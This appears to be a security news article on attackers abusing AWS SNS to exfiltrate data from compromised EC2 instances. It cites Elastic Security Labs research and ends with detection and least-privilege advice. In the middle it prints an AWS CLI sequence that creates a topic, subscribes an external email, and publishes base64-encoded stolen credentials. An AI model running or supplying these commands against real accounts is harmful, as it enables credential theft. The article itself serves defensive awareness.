Amazon Web Services Simple Notification Service (AWS SNS) has emerged as a new vector for malicious actors to exfiltrate sensitive data and conduct phishing campaigns.
This pub/sub messaging service, designed to enable application-to-person and application-to-application communications, is increasingly being exploited by attackers seeking to bypass traditional security controls and network monitoring.
The attacks leverage legitimate AWS functionality to create SNS topics, subscribe external email addresses, and publish sensitive data through API calls that appear as normal AWS service usage.
.png
)
This technique effectively bypasses security groups, network ACLs, and other traditional network-based protections because all communication occurs within trusted AWS infrastructure.
Analysts at Elastic Security Labs identified that adversaries with access to EC2 instances can exploit attached IAM roles that have SNS permissions to establish exfiltration channels.
Their research demonstrated how attackers can use native AWS CLI commands to create topics and subscribe external email addresses that receive the stolen data.
The exfiltration technique is particularly concerning because it leaves minimal forensic evidence and blends with legitimate traffic.
Organizations with permissive IAM policies or monitoring gaps may not detect this activity until after sensitive data has been compromised.
The technical implementation of this attack is straightforward and requires only basic AWS CLI knowledge.
After gaining access to an EC2 instance, attackers can execute a series of commands to establish the exfiltration channel:-
# Create SNS topic and capture its ARN
TOPIC_ARN=$(aws sns create-topic --name "whitebox-sns-topic" --query 'TopicArn' --output text)
# Subscribe external email to the topic
aws sns subscribe --topic-arn "$TOPIC_ARN" --protocol email --notification-endpoint "[email protected]"
# Base64 encode stolen credentials and publish to topic
BASE64_CONTENT=$(base64 /tmp/stolen_creds.txt)
aws sns publish --topic-arn "$TOPIC_ARN" --message "$BASE64_CONTENT" --subject "Encoded Credentials from EC2".webp)
Detection efforts should focus on CloudTrail logs for unusual SNS API calls, particularly CreateTopic, Subscribe, and Publish actions from EC2 instance roles.
Elastic Security Labs provided hunting queries that identify anomalous SNS activity by monitoring for rare user identities creating topics or subscribing with email protocols.
Security teams are advised to implement strict IAM policies following the principle of least privilege and enable comprehensive logging of SNS activities to mitigate this emerging threat vector.
Are you from SOC/DFIR Teams? – Analyse Malware Incidents & get live Access with ANY.RUN -> Start Now for Free.
